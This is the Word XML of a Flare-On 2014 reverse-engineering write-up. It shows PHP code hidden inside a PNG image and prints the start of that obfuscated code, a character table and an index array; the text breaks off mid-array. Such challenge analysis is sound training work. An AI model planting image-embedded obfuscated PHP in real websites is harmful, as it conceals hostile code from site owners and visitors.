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0FE3A" w14:textId="622254CF" w:rsidR="00BC0775" w:rsidRDefault="00AD08DB" w:rsidP="00497A07">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Flare-On</w:t>
      </w:r>
      <w:r w:rsidR="00BC1AED" w:rsidRPr="00BC1AED">
        <w:t xml:space="preserve"> 201</w:t>
      </w:r>
      <w:r w:rsidR="0017744A">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00BC1AED" w:rsidRPr="00BC1AED">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00644BC7">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00DA5733">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00644BC7">
        <w:t>Javascrap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164386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A2D60C" w14:textId="7F989317" w:rsidR="006104AA" w:rsidRDefault="006104AA">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7FAE3A63" w14:textId="202DE2E9" w:rsidR="00DD04A7" w:rsidRDefault="006104A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405836" w:history="1">
            <w:r w:rsidR="00DD04A7" w:rsidRPr="00317CB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="00DD04A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DD04A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DD04A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc39405836 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DD04A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DD04A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DD04A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00DD04A7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A02F355" w14:textId="37135653" w:rsidR="00DD04A7" w:rsidRDefault="00DD0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9405837" w:history="1">
            <w:r w:rsidRPr="00317CB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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_Toc39405837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DD806" w14:textId="5793BFCE" w:rsidR="00DD04A7" w:rsidRDefault="00DD0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9405838" w:history="1">
            <w:r w:rsidRPr="00317CB1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_Toc39405838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53758" w14:textId="5CC0F0FF" w:rsidR="00DD04A7" w:rsidRDefault="00DD0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9405839" w:history="1">
            <w:r w:rsidRPr="00317CB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Identifying the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_Toc39405839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0AA7" w14:textId="4C00E954" w:rsidR="00DD04A7" w:rsidRDefault="00DD0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9405840" w:history="1">
            <w:r w:rsidRPr="00317CB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The FLARE On Challenge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_Toc39405840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80C9" w14:textId="11924993" w:rsidR="00DD04A7" w:rsidRDefault="00DD0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9405841" w:history="1">
            <w:r w:rsidRPr="00317CB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The mysterious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_Toc39405841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69E0" w14:textId="4AD25562" w:rsidR="00DD04A7" w:rsidRDefault="00DD0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9405842" w:history="1">
            <w:r w:rsidRPr="00317CB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Deobfuscating the php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_Toc39405842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97B75" w14:textId="54C250F1" w:rsidR="00DD04A7" w:rsidRDefault="00DD0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9405843" w:history="1">
            <w:r w:rsidRPr="00317CB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Flag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_Toc39405843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645A" w14:textId="4A72237A" w:rsidR="006104AA" w:rsidRDefault="006104AA">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6A2FB8FC" w14:textId="49A26D86" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="77507CA7" w14:textId="25083BAB" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="47E5E2AA" w14:textId="5162A75F" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="50BBCE8A" w14:textId="728B760B" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="6B3C701E" w14:textId="0A11FC05" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="6EFE0489" w14:textId="4644BE42" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="5643CBC2" w14:textId="05578C2F" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="0AA98786" w14:textId="5CEF1263" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="5AA13B9A" w14:textId="2C6DD191" w:rsidR="00873426" w:rsidRDefault="00873426" w:rsidP="006104AA"/>
    <w:p w14:paraId="0C0D729C" w14:textId="7AF2705C" w:rsidR="00873426" w:rsidRDefault="00873426" w:rsidP="006104AA"/>
    <w:p w14:paraId="41CD6146" w14:textId="7F198AF9" w:rsidR="00873426" w:rsidRDefault="00873426" w:rsidP="006104AA"/>
    <w:p w14:paraId="11F57CC7" w14:textId="11C09DC3" w:rsidR="00873426" w:rsidRDefault="00873426" w:rsidP="006104AA"/>
    <w:p w14:paraId="2570EF8C" w14:textId="77777777" w:rsidR="00873426" w:rsidRDefault="00873426" w:rsidP="006104AA"/>
    <w:p w14:paraId="4E848716" w14:textId="727DCB80" w:rsidR="006104AA" w:rsidRDefault="006104AA" w:rsidP="006104AA"/>
    <w:p w14:paraId="2FBF5F0A" w14:textId="39449B25" w:rsidR="0084184E" w:rsidRDefault="0084184E" w:rsidP="006104AA"/>
    <w:p w14:paraId="1800B9AE" w14:textId="4634B766" w:rsidR="00661971" w:rsidRDefault="00661971" w:rsidP="006104AA"/>
    <w:p w14:paraId="6F6C98DF" w14:textId="61701B5B" w:rsidR="00AF6A8D" w:rsidRDefault="00AF6A8D" w:rsidP="006104AA"/>
    <w:p w14:paraId="24D665FA" w14:textId="77777777" w:rsidR="00AF6A8D" w:rsidRPr="006104AA" w:rsidRDefault="00AF6A8D" w:rsidP="006104AA"/>
    <w:p w14:paraId="011C1BB2" w14:textId="3C177997" w:rsidR="00886E54" w:rsidRDefault="00886E54" w:rsidP="00886E54">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc39405836"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6BA073AA" w14:textId="77777777" w:rsidR="006E7290" w:rsidRPr="006E7290" w:rsidRDefault="006E7290" w:rsidP="006E7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7719" w14:paraId="7CF2283C" w14:textId="77777777" w:rsidTr="003B7719">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD0AC4B" w14:textId="3391FBD7" w:rsidR="0024512E" w:rsidRDefault="00730729" w:rsidP="003B7719">
            <w:r w:rsidRPr="00EB10EF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Category:</w:t>
            </w:r>
            <w:r w:rsidRPr="00730729">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD733A">
              <w:t>RE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A7D2C7" w14:textId="1D36ADBD" w:rsidR="0024512E" w:rsidRDefault="00730729" w:rsidP="003B7719">
            <w:r w:rsidRPr="00EB10EF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Points:</w:t>
            </w:r>
            <w:r w:rsidRPr="00730729">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000262BE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="312A45A0" w14:textId="77777777" w:rsidR="00A111FF" w:rsidRDefault="00A111FF" w:rsidP="001443AC"/>
          <w:p w14:paraId="51FD494E" w14:textId="51D44D58" w:rsidR="003B7719" w:rsidRDefault="00FF6A3B" w:rsidP="00035E91">
            <w:r>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="381E36D1" w14:textId="77777777" w:rsidR="00563076" w:rsidRDefault="00563076" w:rsidP="00563076">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc39405837"/>
      <w:r>
        <w:t>Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7A29B9F4" w14:textId="77777777" w:rsidR="00563076" w:rsidRDefault="00563076" w:rsidP="00563076">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HashMyFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DCFB12A" w14:textId="41F7891C" w:rsidR="00563076" w:rsidRDefault="004F1E59" w:rsidP="00563076">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Firefox browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40074B82" w14:textId="47242740" w:rsidR="002217F2" w:rsidRDefault="006F5548" w:rsidP="00990C9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5102AF32" w14:textId="28FC2778" w:rsidR="0020640B" w:rsidRDefault="0020640B" w:rsidP="00990C9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2FA341" w14:textId="68CFB3CD" w:rsidR="00C30CC1" w:rsidRDefault="0018346C" w:rsidP="00C30CC1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc39405838"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00B1624A">
        <w:t>olution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0331B8A3" w14:textId="745EE63E" w:rsidR="007C5830" w:rsidRPr="007C5830" w:rsidRDefault="007C5830" w:rsidP="007C5830">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc39405839"/>
      <w:r>
        <w:t>Identifying the file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="62CB52CA" w14:textId="3356621A" w:rsidR="00805E5E" w:rsidRDefault="003D3F34" w:rsidP="00805E5E">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00805E5E">
        <w:t xml:space="preserve">. We get a file called </w:t>
      </w:r>
      <w:r w:rsidR="001C2570" w:rsidRPr="001C2570">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C2.zip</w:t>
      </w:r>
      <w:r w:rsidR="00805E5E" w:rsidRPr="00F60DD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D340ADE" w14:textId="0CB778CE" w:rsidR="00805E5E" w:rsidRDefault="0069626A" w:rsidP="00805E5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00805E5E">
        <w:t xml:space="preserve">. The MD5 sum of the provided file is </w:t>
      </w:r>
      <w:r w:rsidR="00AF552B" w:rsidRPr="00AF552B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>74ea6bd7a2e19cfd6096614d7d9e8e0f</w:t>
      </w:r>
      <w:r w:rsidR="004B2F4C" w:rsidRPr="00A51F1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A80036" w14:textId="0FED332C" w:rsidR="00C068BB" w:rsidRDefault="0069626A" w:rsidP="00C068BB">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C068BB" w:rsidRPr="001D77C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C068BB">
        <w:t xml:space="preserve"> The provided file is of </w:t>
      </w:r>
      <w:r w:rsidR="008A2423">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r w:rsidR="00C068BB" w:rsidRPr="000F510A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C068BB">
        <w:t>type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0C74C" w14:textId="4BB07E28" w:rsidR="00E64818" w:rsidRDefault="00E64818" w:rsidP="00C068BB">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="007F45F5">
        <w:t>Once we u</w:t>
      </w:r>
      <w:r>
        <w:t>nzip the previous file</w:t>
      </w:r>
      <w:r w:rsidR="001E5317">
        <w:t xml:space="preserve"> (pass: malware)</w:t>
      </w:r>
      <w:r w:rsidR="007F45F5">
        <w:t xml:space="preserve">, we get </w:t>
      </w:r>
      <w:r w:rsidR="001E5317">
        <w:t>two files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F72115" w14:textId="664D6F9C" w:rsidR="001E5317" w:rsidRPr="001E5317" w:rsidRDefault="001E5317" w:rsidP="001E5317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1E5317">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A directory that contains a file called </w:t>
      </w:r>
      <w:r w:rsidR="001B675B" w:rsidRPr="001B675B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flare-on.png</w:t>
      </w:r>
      <w:r w:rsidR="001B675B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B675B">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="001B675B" w:rsidRPr="001B675B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PNG</w:t>
      </w:r>
      <w:r w:rsidR="0071461C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0075618F">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0071461C">
        <w:t>ype.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BEFA1" w14:textId="74D8BEB3" w:rsidR="001E5317" w:rsidRPr="001E5317" w:rsidRDefault="001E5317" w:rsidP="001E5317">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E5317">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Home.html</w:t>
      </w:r>
      <w:r w:rsidR="00911424">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00911424">
        <w:t xml:space="preserve">a file of </w:t>
      </w:r>
      <w:r w:rsidR="00911424" w:rsidRPr="00911424">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTML document</w:t>
      </w:r>
      <w:r w:rsidR="00911424">
        <w:t xml:space="preserve"> type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CF784" w14:textId="67A891DA" w:rsidR="00FE34EA" w:rsidRDefault="00FE34EA" w:rsidP="00FE34EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc39405840"/>
      <w:r>
        <w:t>The FLARE On Challenge portal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="48F04238" w14:textId="1C67BBD5" w:rsidR="00FE34EA" w:rsidRDefault="005641D2" w:rsidP="00FE34EA">
      <w:r>
        <w:t xml:space="preserve">1. Once we display the source content of the file </w:t>
      </w:r>
      <w:r w:rsidRPr="006A1D4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>home.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a browser, it displays the following screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529D94D2" w14:textId="5AACFE76" w:rsidR="005641D2" w:rsidRDefault="005641D2" w:rsidP="000A256B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="310EDC57" wp14:editId="61B43DA0">
            <wp:extent cx="2584748" cy="166489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9260" cy="166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DED1" w14:textId="7AB4223D" w:rsidR="000A256B" w:rsidRDefault="000A256B" w:rsidP="000A256B">
      <w:r>
        <w:t>2. After analyzing its source code, we found the image from the</w:t>
      </w:r>
      <w:r w:rsidRPr="000A256B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000A256B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A325A8" w14:textId="0AE85CC0" w:rsidR="0069610F" w:rsidRDefault="0069610F" w:rsidP="000A256B"/>
    <w:p w14:paraId="0F3AE681" w14:textId="77777777" w:rsidR="0069610F" w:rsidRPr="00FE34EA" w:rsidRDefault="0069610F" w:rsidP="000A256B"/>
    <w:p w14:paraId="59BC9E41" w14:textId="091D10D0" w:rsidR="008A2423" w:rsidRDefault="00E439AE" w:rsidP="00265BD4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B1ABAE1" wp14:editId="7B714634">
            <wp:extent cx="5069727" cy="1526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4087" cy="15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3C1D" w14:textId="7008DD6A" w:rsidR="00265BD4" w:rsidRDefault="00265BD4" w:rsidP="00265BD4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc39405841"/>
      <w:r>
        <w:t>The mysterious image</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="1F232019" w14:textId="52CDB65D" w:rsidR="00265BD4" w:rsidRDefault="00265BD4" w:rsidP="00265BD4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1. The file called</w:t>
      </w:r>
      <w:r w:rsidRPr="00265BD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> flare-on.png </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00265BD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00265BD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D255C0" w14:textId="61518C6B" w:rsidR="009475B8" w:rsidRDefault="001171C0" w:rsidP="009475B8">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00C63415">
        <w:t xml:space="preserve">Analyzing the structure of the image with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C63415" w:rsidRPr="00C63415">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C63415" w:rsidRPr="00C63415">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C63415">
        <w:t xml:space="preserve"> we can see that </w:t>
      </w:r>
      <w:r w:rsidR="009475B8">
        <w:t>it hides a php code inside it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1084CA41" w14:textId="0CCCC647" w:rsidR="009475B8" w:rsidRDefault="009475B8" w:rsidP="0005275A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="053950BE" wp14:editId="00490837">
            <wp:extent cx="4856672" cy="868597"/>
            <wp:effectExtent l="0" t="0" r="127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1536" cy="87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7252" w14:textId="4A5B625F" w:rsidR="009475B8" w:rsidRDefault="0005275A" w:rsidP="009475B8">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="006B046E">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00452DB6">
        <w:t>complete</w:t>
      </w:r>
      <w:r w:rsidR="006B046E">
        <w:t xml:space="preserve"> php code is</w:t>
      </w:r>
      <w:r w:rsidR="00D62DB0">
        <w:t xml:space="preserve"> found if we print the embedded strings in the previous image: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2666" w14:paraId="36342DE6" w14:textId="77777777" w:rsidTr="00672666">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69B0943F" w14:textId="47B1CA70" w:rsidR="00672666" w:rsidRPr="005B0E79" w:rsidRDefault="005B0E79" w:rsidP="009475B8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B0E79">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&lt;?php $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "&lt;", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&amp;", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", "&gt;", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005B0E79">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005B0E79">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 